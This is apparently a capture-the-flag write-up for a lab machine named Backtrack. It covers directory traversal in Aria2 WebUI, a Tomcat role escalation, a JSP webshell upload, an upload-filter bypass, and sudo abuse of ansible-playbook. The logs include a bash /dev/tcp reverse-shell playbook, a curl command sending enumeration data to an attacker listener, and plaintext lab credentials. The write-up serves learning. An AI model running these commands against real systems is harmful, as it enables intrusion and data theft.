The HTTP server on port 8888 returns a WebUI called Aria2 WebUI. Quickly searching for a vuln on Google:
The server on port 8888 may be vulnerable to directory traversal.
2b - Directory Traversal
After clearing the cache on the browser, proxying all requests to Burp and holding the requests for a while without forwarding, we can see how the WebUI behaves and what it sends without having to go through the code. We intercept multiple requests without interacting with the browser, but this is the one we are interested in:
The POST request will be modified in Repeater
Directory Traversal was successful
Amazing! This is a great way to look inside the targets files.
2c - Gathering sensitive info
Trying to brute-force some well-known files using Intruder crashes the Aria server. We have to access files manually in order not to overwhelm and crash the server.
/etc/passwd
/proc/self/environ
/opt/tomcat/conf/tomcat-users.xml
2z - What we know so far
There are 4 accounts that can be considered human based on their ids: root, tomcat, orville and wilbur
We cannot login using tomcat through ssh (/bin/false)
We collected a password from a well-known configuration file for tomcat
The server on port 8888 runs with privileges of the tomcat user
3 - Foothold
3a - Dead-ends
id_rsa
Trying to collect the private key of the users (except tomcat) did not yield anything
authorized_keys
Trying to authorize my own key by writing to the respective .ssh folders did not work because of a lack of adequate permissions for the tomcat user:
Upload succeeds, but cannot be effectively stored in the requested destination location
3b - Tomcat, help!
The tomcat admin credentials we got were great, but the user in question has no useful privileges. This is because its role is only 'manager-script'.
Cannot access host-manager
Cannot access manager
We have to find a way to elevate this tomcat user. This can be done only by editing the /opt/tomcat/conf/tomcat-users.xml file. But how can we do that?
Well, since we already know that the server on port 8888 has the Linux 'tomcat' user's privileges, the server can probably overwrite tomcat-users.xml by downloading a new one!
I will host the following file on my machine, where the roles are significantly higher:
And now using the Aria2 WebUI:
The granular options provided on Aria2 WebUI are very helpful
Fingers crossed
We now have access to the admin panels!
3c - Have I been here before?
If you look closely at the /manager/html panel above, you will notice a path called /reverse_shell!
Requesting it gives us the following:
Why is metasploit mentioned here?!
I am not sure what is happening here, but it is not worth investigating. I do have enough privileges to upload a shell of my own. I will be using a webshell that is bundled in /usr/share/webshells/jsp/jsp-reverse.jsp.
Before uploading, change line 74 to Process proc = rt.exec("/bin/bash");
With socat listening and proxying on the target machine, I am able to do this:
This site seems to indicate it is run by the Orville user
The website does not give us much wiggle room to try and exploit it from the browser. And it seemed like a dead-end. At least when I was tomcat. But now that I am wilbur, I had access to a very important file:
This was the missing puzzle piece! Now I can login and proceed:
Logging in with the newfound credentials stored in /home/wilbur/from_orville.txt
Landing page after login
We can see that there are no images yet. Let us upload as image of our own and see what happens.
The image appeared after uploading
Now the question is: can we upload a shell? I will try to upload my favorite PHP webshell:
It claims to have refused the upload. There is seemingly a whitelisting in place
Indeed, the shell was not stored
We have to bypass these filters:
Adding a 'fake' extension bypasses the filters
However, trying to go to http://backtrack.thm:2345/uploads/shell.gif.php just downloads the file! But we see that in the root directory (above uploads/), where login.php and dashboard.php are stored, the PHP files are rendered instead of sent as is. Dead ends:
Apache/2.4.41 does not have a known directory traversal published, so storing it somewhere on the filesystem using wilbur and trying to access it through Apache won't work
/var/www/html is not accessible using any of the users we compromised
We can however try to add some backtraces to the filename:
Using a simple backtrace will store the file in uploads/. So it fails. We have to use Intruder to try and store it anywhere above uploads/ (ideally just above it). To do that, we will use a famous repo's wordlist:
βββ(kaliγΏkali)-[~]
ββ$ sudo nmap -T4 -p- backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 06:57 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6800/tcp open unknown
8080/tcp open http-proxy
8888/tcp open sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 250.16 seconds
βββ(kaliγΏkali)-[~]
ββ$ sudo nmap -A -p22,6800,8080,8888 backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 07:02 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| 256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_ 256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open http Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open sun-answerbook?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Sat, 12 Oct 2024 04:02:31 GMT
| Connection: close
| <!doctype html>
| <html>
| <!-- {{{ head -->
| <head>
| <link rel="icon" href="../favicon.ico" />
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta name="theme-color" content="#0A8476">
| <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
| <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
| <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
| <!-- }}} -->
| <body ng-controller="MainCtrl" ng-cloak>
| <!-- {{{ Icons -->
|_ <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.94SVN%I=7%D=10/12%Time=6709F4D8%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,13F0,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html
--SNIP--
SF:olute;\x20width:\x200;\x20height:\x200;\x20overflow:\x20hidden;\"\x20ve
SF:rsion=\"1\.1\"\x20xm");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 97.57 ms 10.11.0.1
2 95.60 ms backtrack.thm (10.10.237.46)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.03 seconds
tomcat@Backtrack:/tmp$ cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
tomcat@Backtrack:/tmp$ curl -X POST --data-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
<a-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
curl: (1) Received HTTP/0.9 when not allowed
tomcat@Backtrack:/tmp$
βββ(kaliγΏkali)-[~/public_folder]
ββ$ nc -lvnp 90 > tomcat-enum.txt.b64
listening on [any] 90 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.156.152] 40854
βββ(kaliγΏkali)-[~/public_folder]
ββ$ # removed HTTP headers from response, kept body
βββ(kaliγΏkali)-[~/public_folder]
ββ$ nano tomcat-enum.txt.b64
βββ(kaliγΏkali)-[~/public_folder]
ββ$ dos2unix tomcat-enum.txt.b64
dos2unix: converting file tomcat-enum.txt.b64 to Unix format...
βββ(kaliγΏkali)-[~/public_folder]
ββ$ cat tomcat-enum.txt.b64 | base64 -d > tomcat-enum.txt
tomcat@Backtrack:/$ sudo -l
sudo -l
Matching Defaults entries for tomcat on Backtrack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tomcat may run the following commands on Backtrack:
(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
tomcat@Backtrack:/tmp$ cat rev.yml
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.11.85.12/9003 0>&1'
tomcat@Backtrack:/tmp$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../../tmp/rev.yml
[WARNING]: provided hosts list is empty, only localhost is available. Note that
the implicit localhost does not match 'all'
--SNIP--
[WARNING]: Skipping plugin (/usr/lib/python3/dist-
packages/ansible/plugins/callback/sumologic.py) as it seems to be invalid:
module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'
PLAY [localhost] ***************************************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [rev] *********************************************************************
βββ(kaliγΏkali)-[~/public_folder]
ββ$ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.238.90] 33938
wilbur@Backtrack:/tmp$ id
id
uid=1004(wilbur) gid=1004(wilbur) groups=1004(wilbur)
wilbur@Backtrack:/tmp$ cd ~
wilbur@Backtrack:~$ ls -la
total 36
drwxrwx--- 5 wilbur wilbur 4096 Oct 13 07:34 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 07:22 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
drwx------ 2 wilbur wilbur 4096 Oct 13 07:34 .cache
drwx------ 3 wilbur wilbur 4096 Oct 13 07:28 .gnupg
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat .just_in_case.txt
in case i forget :
wilbur:mYe317Tb9qTNrWFND7KF
wilbur@Backtrack:~$ pwd
pwd
/home/wilbur
wilbur@Backtrack:~$ ls -la
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Oct 13 03:57 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 03:57 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat fr*
cat fr*
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:
email : [email protected]password : W34r3B3773r73nP3x3l$
wilbur@Backtrack:~$
